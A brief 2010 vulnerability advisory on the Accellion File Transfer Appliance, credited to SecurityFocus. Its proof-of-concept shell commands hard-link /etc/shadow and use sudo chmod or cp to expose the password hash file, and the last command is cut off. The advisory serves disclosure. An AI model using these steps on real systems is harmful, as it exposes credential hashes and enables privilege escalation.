Accellion File Transfer Appliance Multiple Remote Vulnerabilities

An attacker can use readily available network utilities to exploit some of these issues. For the HTML-injection and directory-traversal issues, the attacker can use a browser.

The following proofs of concept are available:

sh-2.05b$ ln /etc/shadow /home/admin/oldtemp
sh-2.05b$ sudo /bin/chmod 666 /home/admin/oldtemp

sh-2.05b$ ln /etc/shadow /home/admin/temp
sh-2.05b$ sudo /bin/cp /home/admin/temp /etc/mail/

sh-2.05b$ sudo /usr/local/bin/


Copyright 2010, SecurityFocus